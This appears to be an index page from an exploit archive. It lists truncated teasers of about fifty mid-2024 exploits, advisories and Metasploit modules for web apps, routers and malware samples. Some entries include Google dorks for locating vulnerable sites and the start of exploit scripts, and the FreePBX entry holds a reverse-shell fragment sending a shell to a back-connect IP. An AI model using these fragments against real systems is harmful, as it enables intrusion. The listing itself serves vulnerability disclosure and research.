SimpCMS 0.1 Cross Site Scripting
Exploit Title: SimpCMS v0.1 - Cross Site Scripting XSS Date: 26-06-2024 CVE: CVE-2024-39248 Exploit Author: Jason Jacobs 0xjasonjacobs Vendor Homepage: https://sourceforge.net/projects/simpcms/ Software Link: https://sourceforge.net/projects/simpcms/ Category: Web Application Version: 0.1...
Poultry Farm Management System 1.0 Shell Upload
Exploit Title: Poultry Farm Management System v1.0 - Remote Code Execution RCE Date: 24-06-2024 CVE: N/A Awaiting ID to be assigned Exploit Author: Jerry Thomas w3bn00b3r Vendor Homepage: https://www.sourcecodester.com/php/15230/poultry-farm-management-system-free-download.html Software Link:...
Automad 2.0.0-alpha.4 Cross Site Scripting
Exploit Title: Automad 2.0.0-alpha.4 - Stored Cross-Site Scripting XSS Date: 20-06-2024 Exploit Author: Jerry Thomas w3bn00b3r Vendor Homepage: https://automad.org Software Link: https://github.com/marcantondahmen/automad Category: Web Application Flat File CMS Version: 2.0.0-alpha.4 Tested on:...
SolarWinds Platform 2024.1 SR1 Race Condition
Exploit Title: SolarWinds Platform 2024.1 SR1 - Race Condition CVE: CVE-2024-28999 Affected Versions: SolarWinds Platform 2024.1 SR 1 and previous versions Author: Elhussain Fathy, AKA 0xSphinx import requests import urllib3 import asyncio import aiohttp...
Faronics WINSelect Hardcoded Credentials / Bad Permissions / Unhashed Password
SEC Consult Vulnerability Lab Security Advisory title: Multiple Vulnerabilities allowing complete bypass product: Faronics WINSelect Standard + Enterprise vulnerable version: 8.30.xx.903 fixed version: 8.30.xx.903 CVE number:...
Paradox IP150 Internet Module 1.40.00 Cross Site Request Forgery
Paradox IP150 Internet Module Cross-Site Request Forgery Link: https://github.com/sbaresearch/advisories/tree/public/2024/SBA-ADV-20240321-01ParadoxCrossSiteRequestForgery Vulnerability Overview The Paradox IP150 Internet Module in version 1.40.00 i...
Flatboard 3.2 Cross Site Scripting
Exploit Title: Flatboard v3.2 - Stored XSS Date: 2024-06-23 Exploit Author: tmrswrr Category : Webapps Vendor Homepage: https://flatboard.org/ Version: 3.2 1-Login admin panel , go to this url :...
Carbon Forum 5.9.0 Cross Site Request Forgery / SQL Injection
Title = Carbon Forum 5.9.0 - Multiple Exploits - Author = bRpsd [email protected] - Date Release = 22 June, 2024 - Vendor = Carbon Forum https://www.94cb.com/ Download = https://github.com/lincanbin/Carbon-Forum Vulnerable Versions = 5.9.0 = Tested Version = 5.9.0 on xampp Server. Vulnerability 1 :...
Netis MW5360 Remote Command Execution
This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework class MetasploitModule 'Netis router MW5360 unauthenticated RCE.', 'Description' = %q Netis router MW5360 has a command injection vulnerability via the password paramete...
Edu-Sharing Arbitrary File Upload
SEC Consult Vulnerability Lab Security Advisory title: Arbitrary File Upload product: edu-sharing metaVentis GmbH vulnerable versions: =8.0.8-RC2, =8.1.4-RC0, =9.0.0-RC19 CVE number: CVE-2024-28147 impact: high homepage:...
Student Attendance Management System 1.0 SQL Injection
Titles: Student Attendance Management System-1.0 Bypass Authentication SQLi Author: nu11secur1ty Date: 06/22/2024 Vendor: https://github.com/oretnom23 Software: https://www.sourcecodester.com/php/14561/student-attendance-management-system-using-phpmysqli-source-code.html Reference:...
User Registration And Management System 3.2 SQL Injection
.:. Exploit Title User Registration & Management System - SQLi .:. Google Dorks .:. inurl:loginsystem/index.php .:. Date: June 18, 2024 .:. Exploit Author: bRpsd .:. Contact: cyatlive.no .:. Vendor - https://phpgurukul.com/ .:...
Bagisto 2.1.2 Client-Side Template Injection
Exploit Title: Bagisto 2.1.2 Client-Side Template InjectionCSTI VueJS Date: 06/18/2024 Exploit Author: tmrswrr Vendor Homepage: https://forums.bagisto.com/ Version: 2.1.2 Tested on: https://demo.bagisto.com/ https://demo.bagisto.com/bagisto-common/search?query=77 49...
Apache OFBiz Forgot Password Directory Traversal
This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework class MetasploitModule 'Apache OFBiz Forgot Password Directory Traversal', 'Description' = %q Apache OFBiz versions prior to 18.12.13 are vulnerable to a path traversal...
Backdoor.Win32.Plugx MVID-2024-0686 Insecure Permissions
Discovery / credits: Malvuln John Page aka hyp3rlinx c 2024 Original source: https://malvuln.com/advisory/eeb631127f1b9fb3d13d209d8e675634.txt Contact: [email protected] Media: x.com/malvuln Threat: Backdoor.Win32.Plugx Vulnerability: Insecure Permissions Family: Plugx Type: PE32 MD5:...
PHP CGI Argument Injection Remote Code Execution
This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework class MetasploitModule 'PHP CGI Argument Injection Remote Code Execution', 'Description' = %q This module exploits a PHP CGI argument injection vulnerability affecting P...
Microweber 2.0.15 Cross Site Scripting
Exploit Title: Stored XSS in Microweber Date: 06/18/2024 Exploit Author: tmrswrr Vendor Homepage: https://microweber.me/ Version: 2.0.15 Tested on: http://active.demo.microweber.me/ Vulnerability Description A Stored Cross-Site Scripting XSS vulnerability has been identified in Microweber version...
SPA-CART CMS 1.9.0.6 Username Enumeration / Business Logic Flaw
Exploit Title: Business Logic Flaw and Username Enumeration in spa-cartcmsv1.9.0.6 Date: 6/2024 Exploit Author: Andrey Stoykov Version: 1.9.0.6 Tested on: Ubuntu 22.04 Blog: https://msecureltd.blogspot.com/2024/04/friday-fun-pentest-series-5-spa.html Description - It was found that the applicatio...
Payroll Management System 1.0 Remote Code Execution
Exploit Title: Payroll Management System v1.0 RCE Unauthenticated Google Dork: intitle:"Employee's Payroll Management System" Date: 16/06/2024 Exploit Author: ShellUnease Vendor Homepage: https://www.sourcecodester.com/ Software Link:...
WordPress RFC WordPress 6.0.8 Shell Upload
Exploit for Remote Code Execution RCE in RFC WordPress 6.0.8 import requests import sys target = "https://target.com" Exploit for Remote Code Execution RCE in RFC WordPress 6.0.8 CODE BY E1.Coders "The King of Security" def exploitrfcwordpress: url =...
Premium Support Tickets For WHMCS 1.2.10 Cross Site Scripting
Exploit Title: Premium Support Tickets For WHMCS Reflected XSS Exploit Author: Sajibe Kanti Vendor: ModulesGarden Vendor Homepage: https://www.modulesgarden.com/products/whmcs/premium-support-tickets Product Name: Premium Support Tickets For WHMCS Product Version: v1.2.10 Tested Version: WHMCS...
AEGON LIFE 1.0 SQL Injection
Exploit Title: Life Insurance Management System- SQL injection vulnerability. Exploit Author: Aslam Anwar Mahimkar Date: 18-05-2024 Category: Web application Vendor Homepage: https://projectworlds.in/ Software Link: https://projectworlds.in/life-insurance-management-system-in-php/ Version: AEGON...
AEGON LIFE 1.0 Cross Site Scripting
Exploit Title: Life Insurance Management Stored System- cross-site scripting XSS Exploit Author: Aslam Anwar Mahimkar Date: 18-05-2024 Category: Web application Vendor Homepage: https://projectworlds.in/ Software Link: https://projectworlds.in/life-insurance-management-system-in-php/ Version: AEG...
PHP Remote Code Execution
Exploit Title: PHP Windows Remote Code Execution Unauthenticated Exploit Author: Yesith Alvarez Vendor Homepage: https://www.php.net/downloads.php Version: PHP 8.3, ', '' headers = 'User-Agent': 'Mozilla/5.0 Windows NT 10.0; Win64; x64; rv:123.0 Gecko/20100101 Firefox/123.0', 'Content-Type':...
AEGON LIFE 1.0 Remote Code Execution
Exploit Title: Life Insurance Management System- Unauthenticated Remote Code Execution RCE Exploit Author: Aslam Anwar Mahimkar Date: 18-05-2024 Category: Web application Vendor Homepage: https://projectworlds.in/ Software Link: https://projectworlds.in/life-insurance-management-system-in-php/...
Rejetto HTTP File Server (HFS) Unauthenticated Remote Code Execution
This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework class MetasploitModule 'Rejetto HTTP File Server HFS Unauthenticated Remote Code Execution', 'Description' = %q The Rejetto HTTP File Server HFS version 2.x is vulnerabl...
Cacti Import Packages Remote Code Execution
This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework class MetasploitModule 'Cacti Import Packages RCE', 'Description' = %q This exploit module leverages an arbitrary file write vulnerability CVE-2024-25641 in Cacti versio...
Telerik Report Server Authentication Bypass / Remote Code Execution
This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework require 'rex/zip' class MetasploitModule 'Telerik Report Server Auth Bypass and Deserialization RCE', 'Description' = %q This module chains an authentication bypass...
Lost And Found Information System 1.0 Cross Site Scripting
Exploit Title: Stored Cross Site Scripting Exploit - Lost and Found Information System Exploit Author: Amit Roy Rezur / AR0x7 Date: June 07, 2024 Vendor Homepage: https://www.sourcecodester.com/php/16525/lost-and-found-information-system-using-php-and-mysql-db-source-code-free-download.html...
Lost And Found Information System 1.0 SQL Injection
Exploit Title: Unauthenticated Blind Boolean-Based SQL Injection Exploit - Lost and Found Information System Exploit Author: Amit Roy Rezur / AR0x7 Date: June 07, 2024 Vendor Homepage:...
Quick CMS 6.7 Shell Upload
Title : Authenticated Shell Upload Product : Quick CMS Vendor : https://opensolution.org/ Affected Version : 6.7 Researcher : Eagle Eye Tested on : Window & Linux Date : 11/06/2024 Report : Already contact the vendor but no response Affected path : admin.php , core/common-admin.php,...
Quick Cart 6.7 Shell Upload
Title : Authenticated Remote Code Execution & Shell Upload Product : Quick Cart Vendor : https://opensolution.org/ Affected Version : 6.7 Researcher : Eagle Eye Tested on : Window & Linux Date : 11/06/2024 Affected path : admin.php , core/common-admin.php, database/config.php Affected function :...
Lost And Found Information System 1.0 SQL Injection
Exploit Title: Unauthenticated Blind Time-Based SQL Injection Exploit - Lost and Found Information System Exploit Author: Amit Roy Rezur / AR0x7 Date: June 07, 2024 Vendor Homepage:...
Lost And Found Information System 1.0 Cross Site Scripting
Exploit Title: Reflected Cross Site Scripting Exploit - Lost and Found Information System Exploit Author: Amit Roy Rezur / AR0x7 Date: June 07, 2024 Vendor Homepage: https://www.sourcecodester.com/php/16525/lost-and-found-information-system-using-php-and-mysql-db-source-code-free-download.html...
XMB 1.9.12.06 Cross Site Scripting
Exploit Title: Persistent XSS in XMB 1.9.12.06 Date: 06/12/2024 Exploit Author: Chokri Hammedi Vendor Homepage: https://www.xmbforum2.com/ Software Link: https://www.xmbforum2.com/download/XMB-1.9.12.06.zip Version: 1.9.12.06 Tested on: Windows XP CVE: N/A Vulnerability Details A persistent store...
Carbon Forum 5.9.0 Cross Site Scripting
Exploit Title: Persistent XSS in Carbon Forum 5.9.0 Stored Date: 06/12/2024 Exploit Author: Chokri Hammedi Vendor Homepage: https://www.94cb.com/ Software Link: https://github.com/lincanbin/Carbon-Forum Version: 5.9.0 Tested on: Windows XP CVE: N/A Vulnerability Details A persistent stored XSS...
VSCode ipynb Remote Code Execution
This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework class MetasploitModule 'VSCode ipynb Remote Development RCE', 'Description' = %q VSCode when opening an Jupyter notebook .ipynb file bypasses the trust model. On version...
Oracle Database Password Hash Unauthorized Access
Title: CVE-2020-2969 – Unauthorized Access to Password Hashes by Account with DBA role Product: Database Manufacturer: Oracle Affected Versions: 11.2.0.4, 12.1.0.2, 12.2.0.1, 18c, 19c Tested Versions: 11.2.0.4, 12.1.0.2, 12.2.0.1, 18c, 19c Risk Level: Medium Solution Status: Fixed CVE Reference:...
Kiuwan Local Analyzer / SAST / SaaS XML Injection / XSS / IDOR
SEC Consult Vulnerability Lab Security Advisory title: Multiple critical vulnerabilities product: Kiuwan SAST on-premise KOP & cloud/SaaS Kiuwan Local Analyzer KLA vulnerable version: Kiuwan SAST 2.8.2402.3 Kiuwan Local...
SEH utnserver Pro/ProMAX / INU-100 20.1.22 XSS / DoS / File Disclosure
CyberDanube Security Research 20240604-0 title| Multiple Vulnerabilities product| SEH utnserver Pro/ProMAX / INU-100 vulnerable version| 20.1.22 fixed version| 20.1.28 CVE number| CVE-2024-5420, CVE-2024-5421,...
FengOffice 3.11.1.2 SQL Injection
Exploit Title: FengOffice - Blind SQL Injection Date: 06/2024 Exploit Author: Andrey Stoykov Version: 3.11.1.2 Tested on: Ubuntu 22.04 Blog: https://msecureltd.blogspot.com/2024/05/friday-fun-pentest-series-6.html Steps to Reproduce: 1. Login to application 2. Click on "Workspaces" 3. Copy full U...
Online Pizza Ordering System 1.0 SQL Injection
Titles: opos-1.0 Multiple SQLi Author: nu11secur1ty Date: 06/07/2024 Vendor: https://github.com/oretnom23 Software: https://www.sourcecodester.com/php/16166/online-pizza-ordering-system-php-free-source-code.html Reference: https://portswigger.net/web-security/sql-injection Description: The email...
Trojan.Win32.DarkGateLoader MVID-2024-0685 Code Execution
Discovery / credits: Malvuln John Page aka hyp3rlinx c 2024 Original source: https://malvuln.com/advisory/afe012ed0d96abfe869b9e26ea375824.txt Contact: [email protected] Media: x.com/malvuln Threat: Trojan.Win32.DarkGateLoader multi variants Vulnerability: Arbitrary Code Execution Description:...
Small CRM 1.0 SQL Injection
Exploit Title: Small CRM Developed using PHP and MySQL - SQLi Authentication Bypass Date: 05.06.2024 Exploit Author: Furkan Eren Tetik Vendor Homepage: https://phpgurukul.com/php-projects-free-downloads Software Link: https://phpgurukul.com/small-crm-php Version: 1.0 Tested on: Windows 11, Kali...
Northwind Demo 1.0 Cross Site Scripting
Exploit Title: Northwind, company operations database - Cross-Site Scripting Reflected Date: 04.06.2024 Exploit Author: Furkan Eren Tetik Vendor Homepage: https://bigprof.com/appgini/free-open-source-web-applications Software Link: https://github.com/bigprof-software/northwind-demo Version: 1.0...
Small CRM 1.0 Cross Site Scripting
Exploit Title: Small CRM Developed using PHP and MySQL - Cross-Site Scripting Reflected Date: 05.06.2024 Exploit Author: Furkan Eren Tetik Vendor Homepage: https://phpgurukul.com/php-projects-free-downloads Software Link: https://phpgurukul.com/small-crm-php Version: 1.0 Tested on: Windows 11, Ka...
Boelter Blue System Management 1.3 SQL Injection
Exploit Title: SQL Injection Vulnerability in Boelter Blue System Management version 1.3 Google Dork: inurl:"Powered by Boelter Blue" Date: 2024-06-04 Exploit Author: CBKB DeadlyData, R4d1x Vendor Homepage: https://www.boelterblue.com Software Link:...
WordPress Hash Form 1.1.0 Remote Code Execution
This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework class MetasploitModule 'WordPress Hash Form Plugin RCE', 'Description' = %q The Hash Form – Drag & Drop Form Builder plugin for WordPress suffers from a critical...
WBCE CMS 1.6.2 Remote Code Execution
Exploit Title: WBCE CMS v1.6.2 - Remote Code Execution RCE Date: 3/5/2024 Exploit Author: Ahmet Ümit BAYRAM Vendor Homepage: https://wbce-cms.org/ Software Link: https://github.com/WBCE/WBCECMS/archive/refs/tags/1.6.2.zip Version: 1.6.2 Tested on: MacOS import requests from bs4 import BeautifulSo...
FreePBX 16 Remote Code Execution
Exploit Title: FreePBX 16 - Remote Code Execution RCE Authenticated Exploit Author: Cold z3ro Date: 6/1/2024 Tested on: 14,15,16 Vendor: https://www.freepbx.org/ %26 /dev/tcp/'.$backconnectip.'/4444 0%261'; curlsetopt$ch, CURLOPTSSLVERIFYHOST, false; curlsetopt$ch, CURLOPTSSLVERIFYPEER, false; ec...